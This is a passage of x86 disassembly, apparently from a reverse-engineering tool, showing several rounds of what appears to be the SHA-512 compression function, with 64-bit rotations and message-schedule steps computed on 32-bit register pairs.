		mov	ecx, [esp+170h+var_13C]
		mov	ebx, ecx
		mov	[esp+170h+var_24], eax
		mov	eax, [esp+170h+var_140]
		mov	edx, ecx
		xor	esi, esi
		shr	edx, 9
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		or	edx, edi
		xor	ebx, ebx
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_13C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		xor	edi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_13C]
		mov	ebx, ecx
		and	ecx, [esp+170h+var_134]
		mov	edi, eax
		and	eax, [esp+170h+var_138]
		not	ebx
		and	ebx, [esp+170h+var_12C]
		not	edi
		and	edi, [esp+170h+var_130]
		xor	ebx, ecx
		mov	ecx, [esp+170h+var_124]
		xor	edi, eax
		mov	eax, [esp+170h+var_15C]
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_41FA00[eax*8]
		adc	esi, ds:dword_41FA04[eax*8]
		add	edx, [esp+170h+var_28]
		mov	eax, [esp+170h+var_128]
		adc	esi, [esp+170h+var_24]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_148], eax
		mov	[esp+170h+var_124], ecx
		mov	[esp+170h+var_128], eax
		adc	[esp+170h+var_144], ecx
		mov	eax, [esp+170h+var_11C]
		mov	ecx, [esp+170h+var_120]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		xor	edi, edi
		or	edi, edx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shl	ecx, 1Eh
		shr	edx, 2
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ecx, eax
		mov	ebx, [esp+170h+var_120]
		xor	edx, edx
		mov	ebp, eax
		shld	ebp, ebx, 19h
		or	edx, ebp
		mov	ebp, [esp+170h+var_154]
		shl	ebx, 19h
		shr	ecx, 7
		or	ecx, ebx
		xor	esi, edx
		mov	edx, [esp+170h+var_158]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_120]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_150]
		and	edx, ecx
		mov	ecx, [esp+170h+var_154]
		xor	ebp, eax
		and	ebp, [esp+170h+var_14C]
		and	ecx, eax
		xor	ebx, edx
		xor	ebp, ecx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_128], edi
		adc	[esp+170h+var_124], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_41529E
		mov	eax, [esp+170h+var_B8]
		mov	ecx, [esp+170h+var_B4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_B4]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_100]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_FC]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_100]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_FC]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_F8]
		adc	edx, [esp+170h+var_F4]
		add	ecx, [esp+170h+var_108]
		adc	edx, [esp+170h+var_104]
		mov	[eax+60h], ecx
		mov	[eax+64h], edx
		mov	eax, edx
		mov	[esp+170h+var_108], ecx
		mov	[esp+170h+var_104], eax
		mov	[esp+170h+var_70], ecx
		jmp	short loc_4152AD
; ---------------------------------------------------------------------------

loc_41529E:				; CODE XREF: sub_414BC0+605j
		mov	edx, [esp+170h+var_108]
		mov	eax, [esp+170h+var_104]
		mov	[esp+170h+var_70], edx

loc_4152AD:				; CODE XREF: sub_414BC0+6DCj
		mov	ecx, [esp+170h+var_144]
		mov	ebx, ecx
		mov	[esp+170h+var_6C], eax
		mov	eax, [esp+170h+var_148]
		mov	edx, ecx
		xor	esi, esi
		shr	edx, 9
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		or	edx, edi
		xor	ebx, ebx
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_144]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		xor	edi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_144]
		mov	ebx, ecx
		and	ecx, [esp+170h+var_13C]
		mov	edi, eax
		and	eax, [esp+170h+var_140]
		not	ebx
		and	ebx, [esp+170h+var_134]
		not	edi
		and	edi, [esp+170h+var_138]
		xor	ebx, ecx
		mov	ecx, [esp+170h+var_12C]
		xor	edi, eax
		mov	eax, [esp+170h+var_15C]
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_41FA08[eax*8]
		adc	esi, ds:dword_41FA0C[eax*8]
		add	edx, [esp+170h+var_70]
		mov	eax, [esp+170h+var_130]
		adc	esi, [esp+170h+var_6C]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_150], eax
		mov	[esp+170h+var_12C], ecx
		mov	[esp+170h+var_130], eax
		adc	[esp+170h+var_14C], ecx
		mov	eax, [esp+170h+var_124]
		mov	ecx, [esp+170h+var_128]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		xor	edi, edi
		or	edi, edx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shl	ecx, 1Eh
		shr	edx, 2
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ecx, eax
		mov	ebx, [esp+170h+var_128]
		xor	edx, edx
		mov	ebp, eax
		shld	ebp, ebx, 19h
		or	edx, ebp
		mov	ebp, [esp+170h+var_11C]
		shl	ebx, 19h
		shr	ecx, 7
		or	ecx, ebx
		xor	esi, edx
		mov	edx, [esp+170h+var_120]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_128]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_158]
		and	edx, ecx
		mov	ecx, [esp+170h+var_11C]
		xor	ebp, eax
		and	ebp, [esp+170h+var_154]
		and	ecx, eax
		xor	ebx, edx
		xor	ebp, ecx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_130], edi
		adc	[esp+170h+var_12C], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_4154DA
		mov	eax, [esp+170h+var_A8]
		mov	ecx, [esp+170h+var_A4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_A4]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_110]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_10C]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_110]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_10C]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_B0]
		adc	edx, [esp+170h+var_AC]
		add	ecx, [esp+170h+var_B8]
		adc	edx, [esp+170h+var_B4]
		mov	[eax+68h], ecx
		mov	[eax+6Ch], edx
		mov	eax, edx
		mov	[esp+170h+var_B8], ecx
		mov	[esp+170h+var_B4], eax
		mov	[esp+170h+var_38], ecx
		jmp	short loc_4154EF
; ---------------------------------------------------------------------------

loc_4154DA:				; CODE XREF: sub_414BC0+82Fj
		mov	edx, [esp+170h+var_B8]
		mov	eax, [esp+170h+var_B4]
		mov	[esp+170h+var_38], edx

loc_4154EF:				; CODE XREF: sub_414BC0+918j
		mov	ecx, [esp+170h+var_14C]
		mov	ebx, ecx
		mov	[esp+170h+var_34], eax
		mov	eax, [esp+170h+var_150]
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_14C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_148]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_14C]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_144]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_134]
		not	ebx
		and	ebx, [esp+170h+var_13C]
		not	edi
		and	edi, [esp+170h+var_140]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_41FA10[eax*8]
		adc	esi, ds:dword_41FA14[eax*8]
		add	edx, [esp+170h+var_38]
		mov	eax, [esp+170h+var_138]
		adc	esi, [esp+170h+var_34]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_158], eax
		mov	[esp+170h+var_134], ecx
		mov	[esp+170h+var_138], eax
		adc	[esp+170h+var_154], ecx
		mov	ecx, [esp+170h+var_130]
		mov	eax, [esp+170h+var_12C]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		xor	edi, edi
		or	edi, edx
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shr	edx, 2
		shl	ecx, 1Eh
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ebx, [esp+170h+var_130]
		xor	edx, edx
		mov	ebp, eax
		shld	ebp, ebx, 19h
		or	edx, ebp
		mov	ebp, [esp+170h+var_124]
		shl	ebx, 19h
		xor	esi, edx
		mov	edx, [esp+170h+var_128]
		mov	ecx, eax
		shr	ecx, 7
		or	ecx, ebx
		xor	edi, ecx
		mov	ecx, [esp+170h+var_130]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_120]
		and	edx, ecx
		mov	ecx, [esp+170h+var_124]
		xor	ebp, eax
		and	ebp, [esp+170h+var_11C]
		and	ecx, eax
		xor	ebx, edx
		xor	ebp, ecx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_138], edi
		adc	[esp+170h+var_134], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_415720
		mov	eax, [esp+170h+var_D0]
		mov	ecx, [esp+170h+var_CC]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_CC]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_108]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_104]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_108]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_104]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_C0]
		adc	edx, [esp+170h+var_BC]
		add	ecx, [esp+170h+var_A8]
		adc	edx, [esp+170h+var_A4]
		mov	[eax+70h], ecx
		mov	[eax+74h], edx
		mov	eax, edx
		mov	[esp+170h+var_A8], ecx
		mov	[esp+170h+var_A4], eax
		mov	[esp+170h+var_88], ecx
		jmp	short loc_415735
; ---------------------------------------------------------------------------

loc_415720:				; CODE XREF: sub_414BC0+A75j
		mov	edx, [esp+170h+var_A8]
		mov	eax, [esp+170h+var_A4]
		mov	[esp+170h+var_88], edx

loc_415735:				; CODE XREF: sub_414BC0+B5Ej
		mov	ecx, [esp+170h+var_154]
		mov	[esp+170h+var_84], eax
		mov	eax, [esp+170h+var_158]
		mov	ebx, ecx
		xor	esi, esi
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		mov	edx, ecx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		xor	ebx, ebx
		or	ebx, ebp
		mov	ebp, [esp+170h+var_154]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		mov	ecx, eax
		shl	ecx, 12h
		shr	ebp, 0Eh
		or	ecx, ebp
		mov	ebp, [esp+170h+var_150]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_154]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_14C]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_13C]
		not	edi
		and	edi, [esp+170h+var_148]
		not	ebx
		and	ebx, [esp+170h+var_144]
		xor	edi, ebp
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_41FA18[eax*8]
		mov	edi, [esp+170h+var_12C]
		adc	esi, ds:dword_41FA1C[eax*8]
		add	edx, [esp+170h+var_88]
		mov	eax, [esp+170h+var_140]
		adc	esi, [esp+170h+var_84]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_120], eax
		mov	esi, [esp+170h+var_130]
		mov	[esp+170h+var_140], eax
		adc	[esp+170h+var_11C], ecx
		mov	[esp+170h+var_13C], ecx
		mov	ecx, [esp+170h+var_138]
		mov	eax, esi
		xor	eax, ecx
		mov	[esp+170h+var_98], eax
		mov	eax, [esp+170h+var_134]
		mov	edx, edi
		xor	edx, eax
		mov	[esp+170h+var_94], edx
		mov	edx, esi
		and	edx, ecx
		mov	[esp+170h+var_90], edx
		mov	edx, edi
		and	edx, eax
		mov	[esp+170h+var_8C], edx
		mov	edx, ecx
		xor	esi, esi
		shl	edx, 4
		mov	edi, ecx
		mov	ebx, eax
		shrd	edi, ebx, 1Ch
		shr	ebx, 1Ch
		or	edx, ebx
		or	esi, edi
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		xor	ebx, ebx
		shl	ecx, 1Eh
		or	ebx, ebp
		mov	edi, eax
		xor	edx, ebx
		mov	ebx, [esp+170h+var_138]
		shr	edi, 2
		or	edi, ecx
		mov	ecx, eax
		shld	eax, ebx, 19h
		xor	esi, edi
		shr	ecx, 7
		xor	edi, edi
		or	edi, eax
		mov	eax, [esp+170h+var_98]
		and	eax, [esp+170h+var_128]
		shl	ebx, 19h
		xor	eax, [esp+170h+var_90]
		or	ecx, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_94]
		and	ecx, [esp+170h+var_124]
		xor	edx, edi
		xor	ecx, [esp+170h+var_8C]
		add	esi, eax
		adc	edx, ecx
		add	[esp+170h+var_140], esi
		adc	[esp+170h+var_13C], edx
		cmp	[esp+170h+var_15C], 0
		jz	loc_4159A2
		mov	eax, [esp+170h+var_B8]
		mov	ecx, [esp+170h+var_B4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 13h
		xor	esi, esi
		or	esi, edi
		mov	edi, ecx
		shr	ebx, 13h
		mov	edx, eax
		mov	ebp, eax
		shld	ecx, ebp, 3
		shl	edx, 0Dh
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_B4]
		shrd	eax, ecx, 6
		add	ebp, ebp
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	esi, edi
		xor	esi, eax
		mov	eax, [esp+170h+var_D8]
		xor	edx, ebx
		shr	ecx, 6
		xor	edx, ecx
		mov	ecx, [esp+170h+var_D4]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		xor	edi, edi
		or	edi, ebx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_D8]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_D4]
		shrd	eax, ecx, 7
		shr	ecx, 7
		xor	esi, ebx
		xor	edi, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_D0]
		adc	edx, [esp+170h+var_CC]
		add	ecx, [esp+170h+var_A0]
		adc	edx, [esp+170h+var_9C]
		mov	[eax+78h], ecx
		mov	[eax+7Ch], edx
		mov	eax, edx
		mov	[esp+170h+var_D0], ecx
		mov	[esp+170h+var_CC], eax
		mov	[esp+170h+var_60], ecx
		jmp	short loc_4159B7
; ---------------------------------------------------------------------------

loc_4159A2:				; CODE XREF: sub_414BC0+CEBj
		mov	edx, [esp+170h+var_D0]
		mov	eax, [esp+170h+var_CC]
		mov	[esp+170h+var_60], edx

loc_4159B7:				; CODE XREF: sub_414BC0+DE0j
		mov	ecx, [esp+170h+var_11C]
		mov	ebx, ecx
		mov	[esp+170h+var_5C], eax
		mov	eax, [esp+170h+var_120]
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_11C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		shr	ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_158]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_11C]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_154]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_148]
		not	ebx
		and	ebx, [esp+170h+var_14C]
		not	edi
		and	edi, [esp+170h+var_150]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_41FA20[eax*8]
		adc	esi, ds:dword_41FA24[eax*8]
		add	edx, [esp+170h+var_60]
		mov	eax, [esp+170h+var_128]
		adc	esi, [esp+170h+var_5C]
		add	ecx, edx
		mov	edx, [esp+170h+var_144]
		adc	edx, esi
		add	eax, ecx
		adc	[esp+170h+var_124], edx
		mov	[esp+170h+var_148], ecx
		mov	ecx, [esp+170h+var_140]
		mov	[esp+170h+var_144], edx
		mov	edx, [esp+170h+var_13C]
		mov	ebx, ecx
		mov	ebp, edx
		shrd	ebx, ebp, 1Ch
		xor	edi, edi
		or	edi, ebx
		mov	esi, ecx
		mov	ebx, edx
		shld	edx, ecx, 1Eh
		shr	ebp, 1Ch
		shl	esi, 4
		or	esi, ebp
		shr	ebx, 2
		shl	ecx, 1Eh
		xor	ebp, ebp
		or	ebx, ecx
		mov	[esp+170h+var_128], eax
		or	ebp, edx
		mov	ecx, [esp+170h+var_13C]
		xor	esi, ebp
		mov	ebp, [esp+170h+var_140]
		mov	edx, ecx
		shld	ecx, ebp, 19h
		xor	edi, ebx
		shr	edx, 7
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_98]
		and	ecx, [esp+170h+var_140]
		shl	ebp, 19h
		xor	ecx, [esp+170h+var_90]
		or	edx, ebp
		xor	edi, edx
		mov	edx, [esp+170h+var_94]
		and	edx, [esp+170h+var_13C]
		xor	esi, ebx
		xor	edx, [esp+170h+var_8C]
		add	edi, ecx
		adc	esi, edx
		add	[esp+170h+var_148], edi
		adc	[esp+170h+var_144], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_415BFD
		mov	eax, [esp+170h+var_A8]
		mov	ecx, [esp+170h+var_A4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 13h
		xor	esi, esi
		or	esi, edi
		mov	edi, ecx
		shr	ebx, 13h
		mov	edx, eax
		mov	ebp, eax
		shld	ecx, ebp, 3
		shl	edx, 0Dh
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_A4]
		shrd	eax, ecx, 6
		add	ebp, ebp
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	esi, edi
		xor	esi, eax
		mov	eax, [esp+170h+var_118]
		xor	edx, ebx
		shr	ecx, 6
		xor	edx, ecx
		mov	ecx, [esp+170h+var_114]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		xor	edi, edi
		or	edi, ebx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_118]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_114]
		shrd	eax, ecx, 7
		shr	ecx, 7
		xor	esi, ebx
		xor	edi, ebp
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_D8]
		adc	edx, [esp+170h+var_D4]
		add	ecx, [esp+170h+var_E0]
		adc	edx, [esp+170h+var_DC]
		mov	[eax+80h], ecx
		mov	[eax+84h], edx
		mov	eax, edx
		mov	[esp+170h+var_D4], eax
		mov	[esp+170h+var_14], eax
		mov	eax, [esp+170h+var_128]
		mov	[esp+170h+var_D8], ecx
		mov	[esp+170h+var_18], ecx
		jmp	short loc_415C19
; ---------------------------------------------------------------------------

loc_415BFD:				; CODE XREF: sub_414BC0+F41j
		mov	edx, [esp+170h+var_D8]
		mov	ecx, [esp+170h+var_D4]
		mov	[esp+170h+var_18], edx
		mov	[esp+170h+var_14], ecx

loc_415C19:				; CODE XREF: sub_414BC0+103Bj
		mov	ecx, [esp+170h+var_124]
		mov	ebx, ecx
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_124]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_120]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_124]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_11C]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_14C]
		not	ebx
		and	ebx, [esp+170h+var_154]
		not	edi
		and	edi, [esp+170h+var_158]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_41FA28[eax*8]
		adc	esi, ds:dword_41FA2C[eax*8]
		add	edx, [esp+170h+var_18]
		mov	eax, [esp+170h+var_150]
		adc	esi, [esp+170h+var_14]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_130], eax
		mov	[esp+170h+var_14C], ecx
		mov	[esp+170h+var_150], eax
		adc	[esp+170h+var_12C], ecx
		mov	eax, [esp+170h+var_144]
		mov	ecx, [esp+170h+var_148]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		xor	edi, edi
		or	edi, edx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shl	ecx, 1Eh
		shr	edx, 2
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ecx, eax
		mov	ebx, [esp+170h+var_148]
		mov	ebp, eax
		shld	ebp, ebx, 19h
		xor	edx, edx
		or	edx, ebp
		mov	ebp, [esp+170h+var_13C]
		xor	ebp, [esp+170h+var_134]
		shl	ebx, 19h
		shr	ecx, 7
		or	ecx, ebx
		xor	esi, edx
		mov	edx, [esp+170h+var_140]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_138]
		and	ebp, eax
		mov	eax, [esp+170h+var_13C]
		and	eax, [esp+170h+var_134]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_148]
		and	edx, ecx
		xor	ebx, edx
		xor	ebp, eax
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_150], edi
		adc	[esp+170h+var_14C], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_415E41
		mov	eax, [esp+170h+var_C8]
		mov	ecx, [esp+170h+var_C4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_C4]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_D0]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_CC]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
